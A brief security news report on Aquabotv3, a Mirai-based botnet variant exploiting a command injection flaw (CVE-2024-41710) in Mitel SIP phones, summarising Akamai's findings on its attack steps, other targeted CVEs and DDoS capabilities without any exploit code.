A third variant of the Mirai-based Aquabot malware (Aquabotv3) has emerged, actively exploiting a command injection vulnerability (CVE-2024-41710) in Mitel SIP phones. Discovered by Akamai’s Security Intelligence and Response Team, this latest iteration introduces advanced monitoring capabilities that track termination attempts and report them to command-and-control (C2) servers.

The vulnerability affects Mitel’s 6800, 6900, and 6900w Series SIP phones, commonly deployed in corporate, government, healthcare, and financial sectors. While classified as medium-severity, the flaw enables authenticated attackers with admin privileges to execute arbitrary commands through insufficient parameter sanitization during the boot process.

Attack Methodology:
– Initiates brute-force attacks to gain authentication
– Targets vulnerable endpoint 8021xsupport.html
– Injects malicious code into phone’s configuration
– Downloads and installs architecture-specific payloads
– Establishes persistence and connects to C2 servers

The botnet’s propagation strategy includes exploiting multiple vulnerabilities across various IoT devices, including:
– TP-Link devices (CVE-2018-17532)
– IoT firmware (CVE-2023-26801)
– Web applications (CVE-2022-31137)
– Linksys E-series
– Hadoop YARN
– Dasan routers

Aquabotv3’s primary objective is building a DDoS network capable of launching TCP SYN, TCP ACK, UDP, GRE IP, and application-layer attacks. The operation is marketed on Telegram under various names, including Cursinq Firewall and The Eye Services, supposedly as a DDoS testing tool.

Akamai has released detection rules and indicators of compromise to help organizations identify and mitigate this threat.